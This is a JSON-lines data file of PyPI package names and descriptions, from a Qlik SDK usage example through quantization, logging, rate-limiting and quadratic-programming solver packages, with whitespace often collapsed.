document:session_app.set_script(script)session_app.do_reload()obj=session_app.create_object(GenericObjectProperties(qInfo=NxInfo(qType=\"my-straight-hypercube\",),qHyperCubeDef=HyperCubeDef(qDimensions=[NxDimension(qDef=NxInlineDimensionDef(qFieldDefs=[\"ID\"]))],qMeasures=[NxMeasure(qDef=NxInlineMeasureDef(qDef=\"=Sum(Value)\",))],qInitialDataFetch=[NxPage(qHeight=5,qWidth=2)],),))layout=obj.get_layout()print(\"Hypercube data pages: \",layout)data=obj.select_hyper_cube_cells(\"/qHyperCubeDef\",[0,2,4],[0],False,False)print(\"After selection (notice the `qState` values)\")print(\"HyperCude object data: \",data)layout=obj.get_layout()print(layout)ifnot(len(layout.qHyperCube.qDimensionInfo[0].qGroupFieldDefs)==1andlayout.qHyperCube.qDimensionInfo[0].qGroupFieldDefs[0]==\"ID\"andlayout.qInfo.qType==\"my-straight-hypercube\"):print(\"Error in generated layout ......\")sys.exit(1)rpc rpc.pyimportosimportuuidfromdotenvimportdotenv_valuesfromqlik_sdkimportAuth,AuthType,Config,Qlikfromqlik_sdk.rpcimportRequestObject# get QCS_SERVER and QCS_API_KEY from .env file in the same folder as this scriptfile_dir=os.path.dirname(os.path.abspath(__file__))dotenv_path=os.path.join(file_dir,\"../.env\")ifnotos.path.exists(dotenv_path):print(\"Missing .env file: \"+dotenv_path)env_values=dotenv_values(dotenv_path=dotenv_path)host=env_values.get(\"QCS_SERVER\",False)api_key=env_values.get(\"QCS_API_KEY\",False)auth=Auth(Config(host=host,auth_type=AuthType.APIKey,api_key=api_key))q=Qlik(Config(host=host,auth_type=AuthType.APIKey,api_key=api_key))deflog_request_interceptor(request:RequestObject)->RequestObject:print(\"request: \"+str(request))returnrequestdeflog_qreturn_response_interceptor(response):if\"result\"inresponseand\"qReturn\"inresponse[\"result\"]:qreturn=str(response[\"result\"][\"qReturn\"])print(f\"qReturn:{qreturn}\")returnresponse# register interceptorsauth.rpc.interceptors[\"request\"].use(log_request_interceptor)auth.rpc.interceptors[\"response\"].use(log_qreturn_response_interceptor)session_app_id=\"SessionApp_\"+str(uuid.uuid1())rpc_session=auth.rpc(app_id=session_app_id)withrpc_session.open()asrpc_client:app=rpc_client.send(\"OpenDoc\",-1,session_app_id)handle=app[\"qReturn\"][\"qHandle\"]script=\"Load RecNo() as N autogenerate(200);\"# set load script and reloadrpc_client.send(\"SetScript\",handle,script)rpc_client.send(\"DoReload\",handle)# parameters can be passed without name which will be sent positional in an arraycount_expr=\"COUNT([N])\"positional_eval=rpc_client.send(\"Evaluate\",handle,count_expr)print(f\"Evaluate{count_expr}={positional_eval}\")# parameters can also be passed with name which will be sent as an objectsum_expr=\"SUM([N])\"keyword_eval=rpc_client.send(\"Evaluate\",handle,qExpression=sum_expr)print(f\"Evaluate{sum_expr}={keyword_eval}\")"} +{"package": "qlik_sense", "pacakge-description": "Qlik SenseThis library is a python client for the Qlik Sense APIsOverviewThis library allows users to more easily work with Qlik Sense applications in a larger python workflow. While Qlik's\nAPIs could be used directly, this streamlines the process.Disclaimer:This library, and its maintainer, have no affiliation with QlikTech. 
Qlik support agreement does not cover\nsupport for this application.RequirementsPython 3.7+requestsrequests_ntlmrequests_negotiate_sspiurllib3uuidmarshmallowInstallationThis package is hosted on PyPI:pipinstallqlik_senseExamplesUse this library to work with Qlik Sense apps:fromqlik_senseimportNTLMClientqs=NTLMClient(host='url/to/qlik/sense/server')app=qs.app.get_by_name_and_stream(app_name='My App',stream_name='My Stream')qs.app.reload(app=app)Full DocumentationFor the full documentation, please visit:https://qlik_sense.readthedocs.io/en/latest/"} +{"package": "qlik-test-aviad", "pacakge-description": "qlik-test-aviadthis amazing project does something!"} +{"package": "qlik-test-dani", "pacakge-description": "qlik-test-dani"} +{"package": "qlik-test-etay", "pacakge-description": "qlik-test-etayprint(hello world)"} +{"package": "qlik-test-moshe", "pacakge-description": "No description available on PyPI."} +{"package": "qlik-test-yuri", "pacakge-description": "qlik-test-yuritest"} +{"package": "qlikutils", "pacakge-description": "No description available on PyPI."} +{"package": "qlink", "pacakge-description": "Entity Resolution and Record Linkage library.Installation$pipinstallqgenerationAlgorithm workflowLicensingThe code in this project is licensed under MIT license."} +{"package": "qlink-interface", "pacakge-description": "QLink-Interface (1.0.0)Welcome to QLink-Interface's README.To install the package do:makeinstallTo verify the installation do:make verifyThis package defines the service interface of the link layer and provides a magic link layer protocol.\nFor details about this interface and specific header fields see the paper:A Link Layer Protocol for Quantum Networkshttps://arxiv.org/abs/1903.09778and the QIRG draft:The Link Layer service in a Quantum Internethttps://datatracker.ietf.org/doc/draft-dahlberg-ll-quantum"} +{"package": "qlinks", "pacakge-description": "qlinks: Quantum link modelDocumentation|Quantum link modelInstallationGetting startedLicense\u00a9 Tan Tao-Lin, 2023. Licensed under\naMITlicense."} +{"package": "qlisp", "pacakge-description": "QLispSimulator for qlispReporting IssuesPlease report all issueson github.LicenseMIT"} +{"package": "qlispc", "pacakge-description": "QLispc"} +{"package": "qlist", "pacakge-description": "open-qlist-pyOpen Source lightweight version of qlistQList EnterpriseEnterprise version available athttps://www.qsonlabs.com"} +{"package": "qlite", "pacakge-description": "QLiteDescriptionQLite is a lite project of SQLite ORM at Python3, as lite ORM for lite SQL.Capabilitycreate/drop tables by its QLite ORM-classes;insert/update/delete data by its QLite ORM-objects;select data by QLite query constuctor;select data with autojoin data by foreign key (different strategies);get QLite ORM-object by ID with all its recursion data or one-step data with lazy=TRUE;LinksGitHub -https://github.com/BorisPlus/otus_webpython_005AuthorBorisPlusCommentHomework project \u0430t course \u201cWeb-developer by Python\u201d (https://otus.ru/learning)"} +{"package": "qlivi", "pacakge-description": "No description available on PyPI."} +{"package": "qlkit", "pacakge-description": "No description available on PyPI."} +{"package": "qlknn", "pacakge-description": "QLKNNA collection of tools to create QuaLiKiz Neural Networks.Read theGitLab Pagesandwikifor more information."} +{"package": "qlknnfort", "pacakge-description": "Please refer to thewikifor more usage-type documentation. 
Detailed information about all methods and types defined in QLKNN-fortran can be found on theGitLab Pages"} +{"package": "qlk-test-liat", "pacakge-description": "qlk-test-LiatPrint(\"Test\")"} +{"package": "qllauncher", "pacakge-description": "UNKNOWN"} +{"package": "qlligraphy", "pacakge-description": "Qlligraphy. GraphQL Schema -> Pydantic modelsQlligraphy is a simple CLI tool, that generates pydantic models based on graphQL schema.InstallationpipinstallqlligraphyUsage:Consider the following schema written inexample.gqlenumEpisode{NEWHOPEEMPIREJEDI}typeCharacter{name:String!appearsIn:[Episode]!}Running:qlligraphyexample.gql-oexample.pyResults in the following python file:fromenumimportEnumfromtypingimportList,OptionalfrompydanticimportBaseModelclassEpisode(str,Enum):NEWHOPE=\"NEWHOPE\"EMPIRE=\"EMPIRE\"JEDI=\"JEDI\"classCharacter(BaseModel):name:strappearsIn:List[Optional[Episode]]Please note: This package is still in WIP state."} +{"package": "qllm", "pacakge-description": "QLLMSupports any LLMs in HuggingFace/Transformers, mixed bits(2-8bit), GPTQ/AWQ/HQQ, ONNX exportQLLM is a out-of-box quantization toolbox for large language models, It didn't limit to a specific model, and designed to be auto-quantization layer by layer for any LLMs. It can also be used to export quantized model to onnx with only one args `--export_onnx ./onnx_model`, and inference with onnxruntime.\nBesides, model quantized by different quantization method (GPTQ/AWQ/HQQ) can be loaded from huggingface/transformers and transfor to each other without extra effort.We alread supportedGPTQ quantizationAWQ quantizationHQQ quantizationFeatures:GPTQ supports all LLM models in huggingface/transformers, it will automatically detect the model type and quantize it.We support to quantize model by 2-8 bits, and support to quantize model with different quantization bits for different layers.Auto promoting bits/group-size for better accuracyLatest News\ud83d\udd25[2024/01] SupportHQQalgorithm[2023/12] The first PyPi package releasedInstallationEasy to install qllm from PyPi [cu121]pip install qllmInstall from release package, CUDA-118/121 is supported.\n[py38, py39, py310]https://github.com/wejoncy/QLLM/releasesBuild from SourcePlease set ENV EXCLUDE_EXTENTION_FOR_FAST_BUILD=1 for fast buildIf you are using CUDA-121pip install git+https://github.com/wejoncy/QLLM.gitOR CUDA-118/117git clone https://github.com/wejoncy/QLLM.git\ncd QLLM\npython setup.py installHow to use itQuantize llama2# Quantize and Save compressed model, method can be one of [gptq/awq/hqq]python-mqllm--model=meta-llama/Llama-2-7b-hf--method=gptq--nsamples=64--wbits=4--groupsize=128--save./Llama-2-7b-4bit(NEW) Quantize model with mix bits/groupsize for higher precision (PPL)# Quantize and Save compressed modelpython-mqllm--model=meta-llama/Llama-2-7b-hf--method=gptq--save./Llama-2-7b-4bit--allow_mix_bits--true-sequentialNOTE:only support GPTQallow_mix_bits option refered from gptq-for-llama, QLLM makes it easier to use and flexiblewjat different with gptq-for-llama is we grow bit by one instead of times 2.all configurations will be saved/load automaticlly instead of quant-table which used by gptq-for-llama.if --allow_mix_bits is enabled, The saved model is not compatible with vLLM for now.Quantize model for vLLMDue to the zereos diff, we need to set a env variable if you set pack_mode to GPTQ whenver the method is awq or gptqCOMPATIBLE_WITH_AUTOGPTQ=1python-mqllm--model=meta-llama/Llama-2-7b-hf--method=gptq--save./Llama-2-7b-4bit--pack_mode=GPTQIf you use GEMM 
pack_mode, then you don't have to set the varpython-mqllm--model=meta-llama/Llama-2-7b-hf--method=gptq--save./Llama-2-7b-4bit--pack_mode=GEMMpython-mqllm--model=meta-llama/Llama-2-7b-hf--method=awq--save./Llama-2-7b-4bit--pack_mode=GEMMConversion between AWQ and GPTQpython-mqllm--loadTheBloke/Llama-2-7B-Chat-AWQ--eval--save./Llama-2-7b-chat-hf_gptq_q4/--pack_mode=GPTQOr you can use--pack_mode=AWQto convert GPTQ to AWQ.python-mqllm--loadTheBloke/Llama-2-7B-Chat-GPTQ--eval--save./Llama-2-7b-chat-hf_awq_q4/--pack_mode=GEMMNote:Not all cases are supported, for example,if you quantized model with different quantization bits for different layers, you can't convert it to AWQ.if GPTQ model is quantized with--allow_mix_bitsoption, you can't convert it to AWQ.if GPTQ model is quantized with--act_orderoption, you can't convert it to AWQ.Convert to onnx modeluse--export_onnx ./onnx_modelto export and save onnx modelpython -m qllm --model meta-llama/Llama-2-7b-chat-hf --method=gptq --dataset=pileval --nsamples=16 --save ./Llama-2-7b-chat-hf_awq_q4/ --export_onnx ./Llama-2-7b-chat-hf_awq_q4_onnx/model inference with the saved modelpython-mqllm--load./Llama-2-7b-4bit--evalmodel inference with ORTyou may want to usegenaito do generation with ORT.importonnxruntimefromtransformersimportAutoTokenizeronnx_path_str='./Llama-2-7b-4bit-onnx'tokenizer=AutoTokenizer.from_pretrained(onnx_path_str,use_fast=True)sample_inputs=tokenizer(\"Hello, my dog is cute\",return_tensors=\"pt\")onnx_model_path=onnx_path_str+'/decoder_merged.onnx'session=onnxruntime.InferenceSession(onnx_model_path,providers=['CUDAExecutionProvider'])mask=np.ones(sample_inputs[0].shape,dtype=np.int64)ifsample_inputs[1]isNoneelsesample_inputs[1].cpu().numpy()num_layers=model.config.num_hidden_layersinputs={'input_ids':sample_inputs[0].cpu().numpy(),'attention_mask':mask,'position_ids':np.arrange(0,sample_inputs[0],dtype=np.int64),'use_cache_branch':np.array([0],dtype=np.bool_)}foriinrange(num_layers):inputs[f'past_key_values.{i}.key']=np.zeros((1,32,32,128),dtype=np.float16)inputs[f'past_key_values.{i}.value']=np.zeros((1,32,32,128),dtype=np.float16)outputs=session(None,inputs)Load quantized model from hugingface/transformerspython-mqllm--loadTheBloke/Llama-2-7B-Chat-AWQ--eval\npython-mqllm--loadTheBloke/Llama-2-7B-Chat-GPTQ--eval\npython-mqllm--loadTheBloke/Mixtral-8x7B-v0.1-GPTQ--use_pluginstart a chatbotyou may need to install fschat and accelerate with pippipinstallfschataccelerateuse--use_pluginto enable a chatbot pluginpython -m qllm --model meta-llama/Llama-2-7b-chat-hf --method=awq --dataset=pileval --nsamples=16 --use_plugin --save ./Llama-2-7b-chat-hf_awq_q4/\n\nor \npython -m qllm --model meta-llama/Llama-2-7b-chat-hf --method=gptq --dataset=pileval --nsamples=16 --use_plugin --save ./Llama-2-7b-chat-hf_gptq_q4/For some users has transformers connect issues.Please set environment with PROXY_PORT=your http proxy portPowerShell$env:PROXY_PORT=1080Bashexport PROXY_PORT=1080windows cmdset PROXY_PORT=1080AcknowledgementsGPTQGPTQ-tritonAutoGPTQllm-awqAutoAWQ.HQQ"} +{"package": "qlm", "pacakge-description": "A command line app for taking beautiful notes.qlmgives you access to beautiful notes on any machine.The name comes from the Arabic word for pen:\u0642\u0644\u0645which makes use of the three letter rootq-l-mto cut, snip, prune, clip or truncate. 
So\ntry to keep those notes concise ;-)Basic Usagepip install qlm\nqlm connect 'username/repo'\necho '# My notes' > my_note.md\nqlm add my_note.md\nqlm show my_note.md"} +{"package": "qlmaas", "pacakge-description": "Module qlmaasThis moduleqlmaasis the client ofQaptiva Access(a.k.a.QLM as a Service). This module is part ofmyQLMand is used to submit\nQuantum jobs to a Qaptiva appliance.PrerequisitesThis version of myQLM works on both Windows, macOS and Linux for different versions of Python 3. Please look at thecompatibility matrixto ensure myQLM is installable on your computer.This module can be installed by typing the following command:pip install myqlmLicensemyQLM EULA"} +{"package": "qlmetrics", "pacakge-description": "qlmetricsPython metric tracking"} +{"package": "qload", "pacakge-description": "qload : better assertion on filesqload is a library to load or extract content of a file to perform assertion in automatic tests without\nboilerplate. It support file from filesystem, ftp, s3, ...Benefitsoneliner to assert on the content of a fileuseful differential when the test fails thanks to subpart extractionsupport for the most common formats (yaml, csv, json, txt)support for multiple file systems and protocols (local, ftp, s3)rich expression engine to extract part of a file (regexpfortextandjmespathforcsv,jsonandyamlto improve differential)Gettings startedpipinstallqloadUsageimportqloadassert'database_url: postgresql://127.0.0.1:5432/postgres'inqload.text('file.txt')assertqload.text('file.txt',expression='Hello .*')=='Hello Fabien'assertqload.json('file.json')=={}assertqload.json('s3://mybucket/file1.json')=={}assertqload.json('file.json',expression='$.id')==''assertlen(qload.json('file.json',expression='$.id'))==4assertqload.yaml('file.yml')=={}assertqload.yaml('file.yml',expression='$.id')==''assertqload.csv('file.csv',expression='[*].Account')==['ALK','BTL','CKL']assertqload.csv('file.csv',expression='[*].Account')[0]=='ALK'assertqload.parquet('file.parquet',expression='[*].Account')[0]=='ALK'assertqload.ftp(host='localhost',port=21,login='admin',password='admin').csv(path='dir/file.csv',expression='')==[]assertqload.s3(bucket='bucket',aws_access_key_id='',aws_secret_access_key='',region_name='eu-west-1',endpoint_url='http://localhost:9090').json(path='dir/file.csv')=={}assertqload.isfile('file.json')isTrueassertqload.s3(bucket='bucket').isfile('file.json')isTrue"} +{"package": "qloader", "pacakge-description": "No description available on PyPI."} +{"package": "qlogging", "pacakge-description": "Python Quick Logging | QLoggingBeautifully colored, quick and simple Python logging. 
This logger is based onPython logging packageScreenshots:Terminal/CMDNotebooks:Windows:FeaturesColor logging in Terminal and CMDColor logging in Jupyter Notebook and Jupyter LabColor logging in Kaggle NotebookColor logging in Google Colab NotebookKnow which function the logger was called fromKnow while line number the logger was called fromSupport logging to a fileSimple and clean one-linerCustomizableInstallation$ pip install qloggingExamplesLogging only to console/notebook:import qlogging\nlogger = qlogging.get_logger(level='debug')\n\nlogger.debug(\"This is debug\") \nlogger.info(\"This is info\")\nlogger.warning(\"This is warning\")\nlogger.error(\"This is an error\")\nlogger.critical(\"This is a critical\")Output (output format:List of Controllers* [APIController](#api_controller)## ![Class: ](https://apidocs.io/img/class.png \".APIController\") APIController### Get controller instanceAn instance of the ``` APIController ``` class can be accessed from the API Client.```pythonclient_controller = client.client```### ![Method: ](https://apidocs.io/img/method.png \".APIController.get_basic_auth_test\") get_basic_auth_test> TODO: Add a method description```pythondef get_basic_auth_test(self)```#### Example Usage```pythonresult = client_controller.get_basic_auth_test()```[Back to List of Controllers](#list_of_controllers)"} +{"package": "qpsh", "pacakge-description": "No description available on PyPI."} +{"package": "qps-limit", "pacakge-description": "QPS LimitRun functions under any limited rate usingmultiprocessing+asyncioAvailable on Unix (i.e. Linux, MacOS) only, as the default multiprocessing start method isforkInstallationpipinstallqps-limitor install manually via gitgitclonegit://github.com/antct/qps-limit.gitqps-limitcdqps-limit\npythonsetup.pyinstallUsagefromqps_limitimportLimiterLimiter(func=\"an asynchronous function\",params=\"a generator function yields args and kwargs\",callback=\"a callback function that handles the return values of func\",num_workers=\"number of processes, recommended <= number of CPUs\",worker_max_qps=\"maximum qps per process, None means unlimited\",ordered=\"return ordered results or not, the default option is False\")BTW: The wrapped function returns tuples(idx, res)consisting of the data index and the function return value. Ifordered=Falseis set, the order of the returned values may be randomized for better performance.Quick Start10 workers, each with a maximum qps of 10, to sample data from input stream (i.e. 
reservoir sampling)importrandomfromqps_limitimportLimiterasyncdeffunc(n:int):returnndefparams():forninrange(1000):yield(),{\"n\":n}f=Limiter(func=func,params=params,num_workers=10,worker_max_qps=10,ordered=False)i=0k=10d=[]for_,resinf():ifimax_i:f.stop()breaki+=1Safely write files with multiple processesimportfcntlwriter=open('...','w+')defcallback(line):globalwriterfcntl.flock(writer,fcntl.LOCK_EX)writer.write('{}\\n'.format(line))writer.flush()fcntl.flock(writer,fcntl.LOCK_UN)f=Limiter(...callback=callback)"} +{"package": "qpso", "pacakge-description": "qpsoA Python implementation of quantum particle swarm optimization (QPSO).pip install qpsoThis is a black-box optimization package built upon the quantum paricle swarm\noptimization [1].QuickstartThe usage of this package is very simple.\nFor example, the following code shows how to solve a 10-dimensional opmitzation\nproblem by using QPSO with Delta potential well (QDPSO) proposed in [1].importnumpyasnpfromqpsoimportQDPSOdefsphere(args):f=sum([np.power(x,2.)forxinargs])returnfdeflog(s):best_value=[p.best_valueforpins.particles()]best_value_avg=np.mean(best_value)best_value_std=np.std(best_value)print(\"{0: >5}{1: >9}{2: >9}{3: >9}\".format(\"Iters.\",\"Best\",\"Best(Mean)\",\"Best(STD)\"))print(\"{0: >5}{1: >9.3E}{2: >9.3E}{3: >9.3E}\".format(s.iters,s.gbest_value,best_value_avg,best_value_std))NParticle=40MaxIters=1000NDim=10bounds=[(-2.56,5.12)foriinrange(0,NDim)]g=0.96s=QDPSO(sphere,NParticle,NDim,bounds,MaxIters,g)s.update(callback=log,interval=100)print(\"Found best position:{0}\".format(s.gbest))Bibliography[1] Jun Sun, Bin Feng and Wenbo Xu, \"Particle swarm optimization with particles having quantum behavior,\" Proceedings of the 2004 Congress on Evolutionary Computation (IEEE Cat. No.04TH8753), Portland, OR, USA, 2004, pp. 325-331 Vol.1.\ndoi: 10.1109/CEC.2004.1330875"} +{"package": "qpsolvers", "pacakge-description": "Quadratic Programming Solvers in PythonThis library provides a one-stop shopsolve_qpfunction to solve convex quadratic programs:$$\n\\begin{split}\n\\begin{array}{ll}\n\\underset{x}{\\mbox{minimize}}\n& \\frac{1}{2} x^T P x + q^T x \\\n\\mbox{subject to}\n& G x \\leq h \\\n& A x = b \\\n& lb \\leq x \\leq ub\n\\end{array}\n\\end{split}\n$$Vector inequalities apply coordinate by coordinate. The function returns the primal solution $x^*$ found by the backend QP solver, orNonein case of failure/unfeasible problem. All solvers require the problem to be convex, meaning the matrix $P$ should bepositive semi-definite. Some solvers further require the problem to be strictly convex, meaning $P$ should be positive definite.Dual multipliers:there is also asolve_problemfunction that returns not only the primal solution, but also its dual multipliers and all other relevant quantities computed by the backend solver.ExampleTo solve a quadratic program, build the matrices that define it and callsolve_qp, selecting the backend QP solver via thesolverkeyword argument:importnumpyasnpfromqpsolversimportsolve_qpM=np.array([[1.0,2.0,0.0],[-8.0,3.0,2.0],[0.0,1.0,1.0]])P=M.T@M# this is a positive definite matrixq=np.array([3.0,2.0,3.0])@MG=np.array([[1.0,2.0,1.0],[2.0,0.0,1.0],[-1.0,2.0,-1.0]])h=np.array([3.0,2.0,-2.0])A=np.array([1.0,1.0,1.0])b=np.array([1.0])x=solve_qp(P,q,G,h,A,b,solver=\"proxqp\")print(f\"QP solution:{x= }\")This example outputs the solution[0.30769231, -0.69230769, 1.38461538]. 
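As a quick, hedged sanity check (not part of the qpsolvers documentation), the solution returned in the example above can be verified against the inequality and equality constraints with plain NumPy; the matrices below simply repeat the ones defined in that example, and the 1e-8 tolerance is an illustrative choice rather than a value prescribed by the library:

import numpy as np
from qpsolvers import solve_qp

# Same problem data as in the example above.
M = np.array([[1.0, 2.0, 0.0], [-8.0, 3.0, 2.0], [0.0, 1.0, 1.0]])
P = M.T @ M
q = np.array([3.0, 2.0, 3.0]) @ M
G = np.array([[1.0, 2.0, 1.0], [2.0, 0.0, 1.0], [-1.0, 2.0, -1.0]])
h = np.array([3.0, 2.0, -2.0])
A = np.array([1.0, 1.0, 1.0])
b = np.array([1.0])

x = solve_qp(P, q, G, h, A, b, solver="proxqp")  # any installed solver works here

# Primal feasibility check, up to a small numerical tolerance.
assert x is not None, "solver reported the problem as unsolved"
assert np.all(G @ x <= h + 1e-8), "inequality constraints violated"
assert abs(float(A @ x) - b[0]) < 1e-8, "equality constraint violated"
print("returned solution is primal feasible")
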
It is also possible to get dual multipliers at the solution, as shown inthis example.InstallationPyPITo install the library with open source QP solvers:pip install qpsolvers[open_source_solvers]To install selected QP solvers, list them between brackets:pip install qpsolvers[clarabel,daqp,proxqp,scs]And to install only the library itself:pip install qpsolvers.When imported, qpsolvers loads all the solvers it can find and lists them inqpsolvers.available_solvers.Condaconda install -c conda-forge qpsolversSolversSolverKeywordAlgorithmAPILicenseWarm-startClarabelclarabelInterior pointSparseApache-2.0\u2716\ufe0fCVXOPTcvxoptInterior pointDenseGPL-3.0\u2714\ufe0fDAQPdaqpActive setDenseMIT\u2716\ufe0fECOSecosInterior pointSparseGPL-3.0\u2716\ufe0fGurobigurobiInterior pointSparseCommercial\u2716\ufe0fHiGHShighsActive setSparseMIT\u2716\ufe0fHPIPMhpipmInterior pointDenseBSD-2-Clause\u2714\ufe0fMOSEKmosekInterior pointSparseCommercial\u2714\ufe0fNPPronpproActive setDenseCommercial\u2714\ufe0fOSQPosqpAugmented LagrangianSparseApache-2.0\u2714\ufe0fPIQPpiqpProximal Interior PointDense & SparseBSD-2-Clause\u2716\ufe0fProxQPproxqpAugmented LagrangianDense & SparseBSD-2-Clause\u2714\ufe0fQPALMqpalmAugmented LagrangianSparseLGPL-3.0\u2714\ufe0fqpOASESqpoasesActive setDenseLGPL-2.1\u2796qpSWIFTqpswiftInterior pointSparseGPL-3.0\u2716\ufe0fquadprogquadprogActive setDenseGPL-2.0\u2716\ufe0fSCSscsAugmented LagrangianSparseMIT\u2714\ufe0fMatrix arguments are NumPy arrays for dense solvers and SciPy Compressed Sparse Column (CSC) matrices for sparse ones.Frequently Asked QuestionsCan I print the list of solvers available on my machine?Is it possible to solve a least squares rather than a quadratic program?I have a squared norm in my cost function, how can I apply a QP solver to my problem?I have a non-convex quadratic program, is there a solver I can use?I have quadratic equality constraints, is there a solver I can use?Error: Mircrosoft Visual C++ 14.0 or greater is required on WindowsCan I add penalty terms as in ridge regression or LASSO?BenchmarkThe results below come fromqpbenchmark, a benchmark for QP solvers in Python. In the following tables, solvers are called with their default settings and compared over whole test sets byshifted geometric mean(\"shm\" for short). 
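For intuition, the aggregation described above can be reproduced with a few lines of NumPy; this is only an illustrative sketch (the shift value and the runtimes below are made up for the example, not taken from the benchmark code):

import numpy as np

def shifted_geometric_mean(values, shift=10.0):
    # exp(mean(log(v + shift))) - shift: robust to both large and small outliers
    values = np.asarray(values, dtype=float)
    return float(np.exp(np.log(values + shift).mean()) - shift)

# Hypothetical runtimes (in seconds) of two solvers over the same three problems.
runtimes = {"solver_a": [0.02, 1.5, 30.0], "solver_b": [0.05, 0.9, 45.0]}
shms = {name: shifted_geometric_mean(t) for name, t in runtimes.items()}
best = min(shms.values())
for name, value in shms.items():
    # Dividing by the best solver's value gives the "1.0 is best" convention of the tables.
    print(f"{name}: {value / best:.2f}")
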
Lower is better and 1.0 corresponds to the best solver.Maros-Meszaros (hard problems)Check out thefull reportfor high- and low-accuracy solver settings.Success rate (%)Runtime (shm)Primal residual (shm)Dual residual (shm)Duality gap (shm)Cost error (shm)clarabel89.91.01.01.91.01.0cvxopt53.613.85.32.622.96.6gurobi16.757.810.537.594.034.9highs53.611.35.32.621.26.1osqp41.31.858.722.61950.742.4proxqp77.54.62.01.011.52.2scs60.12.137.53.4133.18.4Maros-Meszaros dense (subset of dense problems)Check out thefull reportfor high- and low-accuracy solver settings.Success rate (%)Runtime (shm)Primal residual (shm)Dual residual (shm)Duality gap (shm)Cost error (shm)clarabel100.01.01.078.41.01.0cvxopt66.11267.4292269757.0268292.6269.172.5daqp50.04163.41056090169.5491187.7351.8280.0ecos12.927499.0996322577.2938191.8197.61493.3gurobi37.13511.4497416073.413585671.64964.0190.6highs64.51008.4255341695.6235041.8396.254.5osqp51.6371.75481100037.53631889.324185.1618.4proxqp91.914.11184.31.071.87.2qpoases24.23916.08020840724.223288184.8102.2778.7qpswift25.816109.1860033995.1789471.9170.4875.0quadprog62.91430.6315885538.24734021.72200.0192.3scs72.695.62817718628.1369300.93303.2152.5Citing qpsolversIf you find this project useful, please consider giving it a :star: or citing it if your work is scientific:@software{qpsolvers2024,author={Caron, St\u00e9phane and Arnstr\u00f6m, Daniel and Bonagiri, Suraj and Dechaume, Antoine and Flowers, Nikolai and Heins, Adam and Ishikawa, Takuma and Kenefake, Dustin and Mazzamuto, Giacomo and Meoli, Donato and O'Donoghue, Brendan and Oppenheimer, Adam A. and Pandala, Abhishek and Quiroz Oma\u00f1a, Juan Jos\u00e9 and Rontsis, Nikitas and Shah, Paarth and St-Jean, Samuel and Vitucci, Nicola and Wolfers, Soeren and @bdelhaisse and @MeindertHH and @rimaddo and @urob and @shaoanlu},license={LGPL-3.0},month=feb,title={{qpsolvers: Quadratic Programming Solvers in Python}},url={https://github.com/qpsolvers/qpsolvers},version={4.3.1},year={2024}}ContributingWe welcome contributions! The first step is to install the library and use it. Report any bug in theissue tracker. If you're a developer looking to hack on open source, check out thecontribution guidelinesfor suggestions.We are also looking forward to hearing about your use cases! Please share them inShow and tell\ud83d\ude4c"} +{"package": "qpsolversbench", "pacakge-description": "qpsolversbenchMinor utilities for examining quadratic solvers on problems from the precise package."} +{"package": "qpsolvers_benchmark", "pacakge-description": "QP solvers benchmarkBenchmark for quadratic programming (QP) solvers available in Python.The goal of this benchmark is to help users compare and select QP solvers. Its methodology is open todiscussions. The benchmark ships standard and communitytest sets, as well as aqpsolvers_benchmarkcommand-line tool to run test sets directly. The main output of the benchmark are standardized reports evaluating allmetricsacross all QP solvers available on the test machine. This repository also distributesresultsfrom running the benchmark on a reference computer.New test sets are welcome! The benchmark is designed so that each test-set comes in a standalone directory. 
Feel free to create a new one andcontribute ithere so that we grow the collection over time.Test setsThe benchmark comes with standard and community test sets to represent different use cases for QP solvers:Test setProblemsBrief descriptionMaros-Meszaros138Standard, designed to be difficult.Maros-Meszaros dense62Subset of Maros-Meszaros restricted to smaller dense problems.GitHub free-for-all12Community-built, new problemsare welcome!SolversSolverKeywordAlgorithmMatricesLicenseClarabelclarabelInterior pointSparseApache-2.0CVXOPTcvxoptInterior pointDenseGPL-3.0DAQPdaqpActive setDenseMITECOSecosInterior pointSparseGPL-3.0GurobigurobiInterior pointSparseCommercialHiGHShighsActive setSparseMITHPIPMhpipmInterior pointDenseBSD-2-ClauseMOSEKmosekInterior pointSparseCommercialNPPronpproActive setDenseCommercialOSQPosqpDouglas\u2013RachfordSparseApache-2.0PIQPpiqpProximal Interior PointDense & SparseBSD-2-ClauseProxQPproxqpAugmented LagrangianDense & SparseBSD-2-ClauseqpOASESqpoasesActive setDenseLGPL-2.1qpSWIFTqpswiftInterior pointSparseGPL-3.0quadprogquadprogGoldfarb-IdnaniDenseGPL-2.0SCSscsDouglas\u2013RachfordSparseMITMetricsWe evaluate QP solvers based on the following metrics:Success rate:percentage of problems a solver is able to solve on a given test set.Computation time:time a solver takes to solve a given problem.Optimality conditions:we evaluate all threeoptimality conditions:Primal residual:maximum error on equality and inequality constraints at the returned solution.Dual residual:maximum error on the dual feasibility condition at the returned solution.Duality gap:value of the duality gap at the returned solution.Cost error:difference between the solution cost and the known optimal cost.Shifted geometric meanEach metric (computation time, primal and dual residuals, duality gap) produces a different ranking of solvers for each problem. To aggregate those rankings into a single metric over the whole test set, we use theshifted geometric mean(shm), which is a standard to aggregate computation times inbenchmarks for optimization software. This mean has the advantage of being compromised by neither large outliers (as opposed to the arithmetic mean) nor by small outliers (in contrast to the geometric geometric mean). Check out thereferencesbelow for further details.Here are some intuitive interpretations:A solver with a shifted-geometric-mean runtime of $Y$ is $Y$ times slower than the best solver over the test set.A solver with a shifted-geometric-mean primal residual $R$ is $R$ times less accurate on equality and inequality constraints than the best solver over the test set.ResultsThe outcome from running a test set is a standardized report comparingsolversagainst the differentmetrics. Here are the results obtained on a reference computer:Test setResultsCPU infoGitHub free-for-allFull reportIntel(R) Core(TM) i7-6500U CPU @ 2.50GHzMaros-MeszarosFull reportIntel(R) Core(TM) i7-6500U CPU @ 2.50GHzMaros-Meszaros denseFull reportIntel(R) Core(TM) i7-6500U CPU @ 2.50GHzYou can check out results from a variety of machines, and share the reports produced by running the benchmark on your own machine, in theResults categoryof the discussions forum.LimitationsHere are some known areas of improvement for this benchmark:Cold start only:we don't evaluate warm-start performance for now.CPU thermal throttling:the benchmark currently does not check the status of CPU thermal throttling. 
